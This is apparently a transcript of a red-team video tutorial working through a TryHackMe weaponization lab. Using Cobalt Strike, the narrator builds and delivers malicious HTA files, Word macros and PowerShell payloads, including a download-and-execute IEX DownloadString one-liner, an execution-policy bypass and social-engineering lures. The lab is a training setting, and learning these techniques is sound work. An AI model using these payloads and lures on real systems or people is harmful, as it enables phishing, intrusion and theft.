All right, welcome to weaponization. And in this one, if you were ever confused about how do we actually deliver these payloads, right? How do we weaponize a payload, obviously, deliver it, and use it to exploit a remote target or even a local target and connect back to our C2 server, that is what we will be covering pretty thoroughly in this one. Now, they start off with a nice little infographic here, just really illustrating the scenario. So you have a attacker, which could be somewhere else on the internet, maybe behind a firewall or router, what have you, on their own internal network. And you have your red team infrastructure set up somewhere, maybe in the cloud even. And you have some kind of malicious file that you deliver to your target. Now, how do you deliver it? Well, we're going to be covering a bunch of ways to do that. But suffice it to say, maybe in one way or another, the victim will go out and get your file or you deliver it to them. And that file will contain some malicious code on there that will have their system connect back to our red team infrastructure. Notice it says red team infrastructure and not C2 server, right? Because as we've seen in previous videos, that is not good OPSEC to have it connect straight back to your C2. It's going to be easily tracked down and, you could be blocked, you could be taken down in the case of if you're using like a cloud provider and they find out it's running Cobalt Strike, right? They could bring your stuff down. So it's much better to use an HTTP redirector, which is something I covered in a previous video. Go ahead and check that out on the channel. You just scroll back just a little bit. And as you're learning this stuff and leveling up, eventually you're going to come to the point where you're ready to start interviewing for jobs. Maybe you are pursuing this red team stuff because you already have some experience as a pen tester. Well, you're still going to definitely need to brush up on those interview skills in order to make that happen. So check it out down in the description below, and it can be useful to you no matter if you're just starting out in this field or if you have some experience and you're looking to make the leap into the next job. So let's just keep going here. We are going to cover a number of ways to do this weaponization, right? Windows script host, HTML applications, HTAs, VBA, and of course, PowerShell. So they have a deployable machine here. I'm not going to worry about that because I'm going to show you guys from a different perspective. In this room, if you guys, highly encourage you to follow along as well and do this room and gain experience that way. But in this room, they're mostly using Metasploit and stuff like that, and just basic payloads, basic netcat, reverse shell, stuff like that. Maybe not necessarily netcat, but just your basic TCP IP persistent connections, right? Instead, I'm going to use Cobalt Strike and show you how we can weaponize all this stuff. But instead of just using a dumb persistent connection, we're going to actually spawn a beacon and be able to utilize a command and control framework. So it covers Windows scripting host here, as you see with VBA files, VBS files, VB script, right? It can access the Windows API to do a number of things like just spawning a message box. But of course, it can actually do even more than that, right? Like running any binary on the system that you have access to. So calc.exe, or maybe more useful to us as attackers, a reverse shell. But just to showcase that, right, they have some code here. And you could literally paste this in Notepad or any text editor. It doesn't matter. Let's just use Notepad here because it's quick. And we'll put in this payload here that will spawn calculator. So we'll save this file to the desktop. And we'll call it payload.vbs. And if we double click this to run it, we'll see it spawn calculator. It's really as simple as that. And of course, instead of spawning calculator, we could have this spawn a reverse shell or whatever we want to do. And that's how you'd actually weaponize that. But moving along here, they also cover HTAs, which are HTML applications. So essentially, as you see here, it's just HTML. But instead of displaying content, the intention is to download a file. So automatically download a file as soon as you browse to that page. In this case, they are going to download a file for launching the command prompt CMD. But let's take this a step further, right? If you scroll down here, you see that eventually they use MSF Venom to generate a payload so that whenever you go to that endpoint, it will download a file that you can run to get a reverse shell. But to do one even better than that, instead of Meterpreter and all that stuff, let's use Cobalt Strike. Because in Cobalt Strike, they have built-in ways to generate HTA files. So if we go to attacks and packages, and let me just start off by saying first, you want to make sure you have your listener going and that you have the appropriate IP and all of that. That's what I have configured down here in the listeners. But if I go to attacks and packages, I can choose HTML application. And what this is going to do is generate an HTA file, a malicious HTA file to connect to my Cobalt Strike team server and spawn a beacon. So I'll choose that. And we have a number of options here that I can go with. We'll go with PowerShell. Just generate that, and we'll save it to a directory. Any directory is fine. We just got to make sure that we're then hosting that file. So let me do that. Not sure what's going on there. I'll just use Python web server to host the file. And let me just check my IP really quickly here. So we're going to use this one here. And now on our target, if we maybe entice them through social engineering or whatever, send them the link maybe in an email, a phishing email, and they click the link that takes them here. Of course, for OPSEC purposes, we wouldn't want to name it evil.hta. We'd want it to name it something more legitimate sounding, right? But if we do that, as you notice, as soon as we go there, it auto downloads it. So if we run this, what we'll notice is if we check our team server, we now have a beacon. And of course, we can interact with this beacon, run commands, do all the good stuff that we've been doing on this channel when we get code execution, right? Let me just go ahead so it's not confusing here. I'm going to actually remove this. And instead, let's play around with some of the other weaponization stuff we can do. So that was HTA files. Of course, you have VBAs as well. And one really useful use case of VBAs is inside macros. So Word macros, Excel macros, they basically work the same. You will have essentially just VBA code. Now, the nice thing, so they show you how to do this the really bog standard way, I guess you would say, where they'll actually give you the code. And I recommend doing it the manual way first. I'm going to show you how to do it in Cobalt Strike. But you can just, you can actually just write ones that will just pop a message box or something like that, which is a good way to learn initially. You want to save it. You could save it as a .doc file or a Word-enabled macro document, which is a .docm file. Either one will work. You just got to make sure that it is a Word format that supports macros. So the docx format does not support macros. So you want to save it as one of those types. And they talk about it here. .doc or .docm is going to be the formats. One of those, what you would want to choose. And so they pop a message box first, then they pop calculator, and then they generate a payload using MSF Venom, and they plug that in. And so with MSF Venom, they're going to put it in VBA format, of course, so they can just plug that in. Now, to show you how to do this in Cobalt Strike, and let me just kill this one here. So there's no confusion here on which shell is which. If we go to attacks, packages, MS Office macro, it says this package generates a VBA macro that you may embed into a Microsoft Word or Excel document. Awesome. Let's choose our listener, of course, and then hit generate. And actually, it's going to walk you through how to do this. If you've never done this before, this is very useful instructions here. But we could simply click copy macro. It's going to copy the entire payload, the VBA payload, into our clipboard, so we're good to go. I'm just going to go ahead and create it on this system. Now, of course, in real world, you would have some Windows attacker system with Word in Excel or whatever, the Microsoft Office suite installed on it, and you're going to create your payload there, and then you deliver it to the victim, and then when they click on it and they enable the macros, you get the beacon. But just to simplify things, I'm just going to do it on the target system itself. So let's go ahead and launch Word. I'm going to choose a blank document and go to View and then Macros. And this next part is really important. You want to select this drop down here. You want to choose your current document. And now we need to name the macro. Call it my macro. Any name's fine. Doesn't matter what you name it. Hit create. I'm going to delete all this and paste in what's in my clipboard, which is the payload that was generated by Cobalt Strike. So now I can just exit out of here. And file, this part is also very important. File, save as. We need to change the file type. Like I said, to either docm or doc. And save it. Now, ideally, what you'd want to do is make this believable. Don't just have an empty doc. Like, have some kind of writing in here that's like enticing, like social engineering type stuff, right? So, this document... using an older version of Word. Please enable macros to view the content. Something like that, some kind of enticing message. Save it and then close down. And let's just check back here. So we see right now we don't have any beacons. We launch this. And everything seems to start up fine. If we go here, we now have a beacon. And it just auto ran because that was a macro-enabled Word document. Pretty cool. In some cases, it will prompt the user to enable the macros. That's why if you have some good social engineering in the document itself, you can just entice the user. And a lot of times, users are not as smart as you think. A lot of times, it's kind of like accepting a EULA, right? Accepting the end user license agreement. They're just going to be like, okay, just show me the content already, and they just click the button, and then you have your beacon, right? So in this case, we're good to go here, and let's dive back into it. Sorry about the dog in the background. PowerShell, of course, you could use PowerShell to gain access as well. And this part will be really straightforward. From the Cobalt Strike perspective, but typically, you're going to need to enable the execution policy and stuff like that so that you can actually run scripts on the target system. But honestly, a lot of times in IT environments, this is already enabled for you because the administrators are running scripts and stuff like that all the time. So this is not that difficult to fly under the radar with. But let's just go ahead and demo this. Before we do, let's just go ahead once again and kill this beacon so there's no confusion at play here. And we can exit out of this. And now we're just going to go into, let's see here, packages, payload generator. Select our listener. And as you see, we have a ton of different formats that we can generate a payload for. Let's just do PowerShell. We can also generate it as a PowerShell command, actually. Let's do the PowerShell command. That might be a little bit more useful for us, a little bit more interesting. So the difference is one is a PowerShell command. The other one is the actual PowerShell code itself, like a PowerShell script. Either one we could generate. So this text file would be what they would need to run in their command line. I don't know. How should we demo this? You know what? Let's just do the PowerShell itself. So not the command, but just the regular PowerShell. Choose, generate, save it, payload.ps1. And let's make sure we don't have any active sessions here. Sometimes it likes to connect back to us, which is pretty nice. But in this case, we don't want to be confused here. So let's go ahead and spawn PowerShell. And we're going to deliver the payload over to the target system first. So C users, I'm going to put it on the desktop. So let's just go ahead and run cert util euro cache. Honestly, probably the better way to do this. Let's do a set execution policy bypass, just to make sure we can run PowerShell scripts. And let's actually use the PowerShell command. This is the easier way to do this. I'm already hosting the file. So we're going to use download string. And this way, it's actually going to execute the file without even downloading it to disk, which is really, really cool. So we could do something like, and I know this is small, let me make this larger for you guys. IEX, new object, net web clients, download string. And then we'll put in our IP address. 168.19.194, I believe, is the address. And of course, then the file. So this is payload.ps1. So we run that. And now when we check back, looks like one of those other ones popped up again. But we did get this one here. We know that for a fact because we see the process is PowerShell.exe. Whereas before, we're getting the process is run DLL32. So now we have gotten a beacon by PowerShell. Awesome. And it wraps up with just talking about some C2 frameworks. But honestly, this is what we've been doing the whole time, using Cobalt Strike here. And of course, that's the first one that it mentions, just because that is the, I hesitate to say industry standard, because a lot of malicious groups are using this as well. Hacking groups, APTs, right? They're not quite in the industry per se, but yeah, real attackers are using this command and control framework. So that's why it's really handy to use. If you are in a position where you can get into red teaming and you can get a license through your company, that's the way to go. I would not recommend buying the license to this thing because it is super expensive. And for an organization, for a company you work for, it's really going to be within their budget, probably not within your personal budget. And with the amount of cool stuff to play around with, there's so many C2 frameworks out there. If you look at the site here, C2 Matrix, you can see a whole list of them, which is really awesome. Find which C2 fits your needs. Look at all these here. You can just scroll on, and there's a lot more than what you just see here. It actually will ask you a few questions to see what's most important to you. It will recommend. It will kind of filter through for you, right? And so I would just start playing around with some of the ones you see on here. But if you want a place to start, if you don't know what C2 to use, you have no idea, I would just go with the recommendations on Try Hack Me. Why not? PowerShell Empire, Metasploit, we covered on this channel as well. I mean, Metasploit, I wouldn't really recommend using as a C2 framework. You definitely can, but I would definitely recommend playing with something a little bit more sophisticated. So PowerShell Empire, good place to start. Of course, on this channel, we have covered the awesome C2 that was created by C-Spider, which I am drawing a blank on right now. Havoc C2. Definitely check that one out as well. And of course, another good go-to one that you can use that is open source and everything is the C# one. Once again, drawing a bit of a blank on it. What is it? C2, C#. Covenant. Yeah, you can check out Covenant as well. So those are some good places to get started. And you have a number of ways that we could deliver the exploit, right? Through email, either a malicious link to maybe an HTA file or an email attachment with a malicious Word doc that has the macro, web delivery, right? Hosting that file, put it on a USB, do a USB drop, just drop it in the parking lot, right? Maybe someone picks it up and they're like, what's on this USB? Let me plug it in to my system. And then you got code execution just like that, especially if you're using something like a rubber ducky, where as soon as they plug it into their computer, it will automatically run. You get the beacon back. But there's some other really cool stuff here, like this OMG cable, which seems really awesome. I looked into this. This is something that I might want to explore. This is cool. This is actually like a chargeable cable like you would plug into your phone, but it can actually deliver payloads and stuff for you, which is really neat. Definitely something I would like to check out maybe in the future. But of course, we have the practice arena here, and it's basically the stuff that we've been doing already. I could start it up really quick just to show you guys. I probably should have done this earlier because it does take a minute to start up. But what we can do, let's just get our environment ready on this end here. And I'm going to create a new listener because now we got to interface with TryHackMe's network. So I connected to the TryHackMe VPN. And this results in me getting an IP address for the TryHackMe network. So going into Cobalt Strike, all we need to do is add a new listener. We'll call it TryHackMe. And we will plug in the host as the stager. And of course, keep in mind, this is not good OPSEC here. We're going straight to our C2 server, no redirector, no nothing. But this is just for demonstration purposes, right? We're using the default profiles. A lot of stuff we're doing in here, not good OPSEC. I just want to make sure everyone's aware of that. But it'll get the job done for this room here. So now we have the IP address, and it wants us to go actually to port 8080 on this thing. So let's do that. Launch the web browser, and we can generate whatever payload we want here. So let's just go ahead and go to the site. Give it a second to load here. Not sure why it's being slow. Let's try specifying the protocol. And this might be a case of we might have to like restart the room. You hate to see it, but this does happen with TryHackMe sometimes, where it just, for whatever reason, the servers don't want to work on the... Oh, here we go. I think it just took a minute for this web server to spin up, but it is ready to go now. And we see you can upload files, and there's like some kind of script in the background that's going to actually simulate, like as if a user were to open that and enable the macro or whatever, right? So it says that we can upload the following payload extensions. So we can upload a PowerShell script, a Word doc, or a VBS script. And we can also host a malicious HTA file, and they'll run it. So let's just go ahead and try one of these here to showcase it. So let's go to Cobalt Strike, and this is going to be reiterating what we've already done, basically. We'll go to Payload Generator, and we're going to choose the TryHackMe listener. Generate PowerShell payload. And we'll call it tryhackme.ps1, just so there's no confusion. And we'll go ahead and upload that to the server. So we upload tryhackme.ps1. Upload successful. Now let's check back here. And boom, we have a beacon on the target now. And we could play around with the other way before we explore and get the flag. Let's go ahead and try the HTA, like they mentioned as well. That's all we need to do for that, once again, is to choose packages, HTML application, and this time the TryHackMe listener. And any format's fine. Well, we could maybe try executable this time around for something different. And it'll just be tryhackme.hta. And of course, once again, just to confirm, we can actually, yeah, that's right. This one is not self-hosted, or this one is self-hosted. It's not hosted automatically by Cobalt Strike, But we do have, I think we still have the Python web server going. Yeah, we do. So we're actually hosting this file still. So we're good to go there. Now we just give it the URL of our machine here. I'm not sure if that one is still my IP. 072, was that it? Might have been. Cool. We'll change this to tryhackme.hta. And we'll send it. And so what we should see here is, yep, there we go. We got the second beacon, that one off thm.exe. So we see they're both successful, and we could go in and interact with anyone we want. Once again, just for the sake of the recording here, I'm going to disable the sleep timer so it's interactive. So this stuff will go a little bit faster since the video is already getting a bit lengthy at this point. Now, of course, this is not going to go into effect until it actually checks back in with the server. As you see here, it's been 35 seconds. So at the 1 minute mark, it's going to check back, see that set sleep to 0, and then it's going to become interactive from that point. So if there was any confusion, that's how it works. But while we're waiting on that, we can check the instructions here, see what it wants us to do. It just wants to get the flag from the user desktop folder. So there's a few things we need to enumerate here. First of all, what is the user that we're running as? So we could take a look at what our options are within Cobalt Strike to see how we might want to go about achieving that. And so I can make this a little bit larger here. So let's see here. Here's some of the built-in commands that we can run. This one might be useful here. Get UID, to get the user ID. That should tell us who we're running as. Of course, we could just run shell who am I, but just to show you some different ways to do it. So this is the name of the computer, and we are the tryhackme user, which is an admin on the box. So we should have full access just based off of that. We could even elevate to get system if we wanted to as well, I would guess. But what we need to do then is just read the flag from that directory. And usually on tryhackme, their flags are called flag.txt. It says it's in the desktop, so we could use the built-in download command to try to download that file. Why not? Let's do it. So download, and then the path to the file, which should be C users thm desktop flag.txt. And there's no spaces in here, so we probably don't need to enclose it in quotes. Probably doesn't really matter. And we see here that we downloaded the file. Now, where does this go? Well, actually, if we open a new terminal here, if you go into opt in your Cobalt Strike folder, you'll see this folder here created called downloads. So you just need to go into downloads, and this is the file here with the flag. So awesome. We have completed this room, and more importantly, we have explored it from a whole nother angle, the angle of Cobalt Strike and using it in the real world scenario. Of course, there's a lot of OPSEC considerations we're going to get into later on in the series and things like that. And how do you bypass AV? Because, right, all the payloads and stuff that we've delivered, the only reason this worked against my machine and against the tryhackme machine as well is because, of course, antivirus is disabled. There's no third-party antivirus running on these servers. And even I have disabled Windows Defender just to show you guys here, right? So real-time protection is off. If it was on, then we would have to find ways to bypass it. So this is a very simplistic view of everything, but hopefully you can see how these pieces are starting to fit together to allow us to do what we do every day as red teamers. So hopefully you're enjoying the series so far. If you want to get into more technical content, I have that on the screen for you right now. And let me know down in the comment section below, are you enjoying the series? Is this something that you want to see more of? And as always, if you have any suggestions as well, drop them down. I love to hear what you guys are interested in, make content based off of that. So y'all see you guys right over in those videos. Thanks for watching.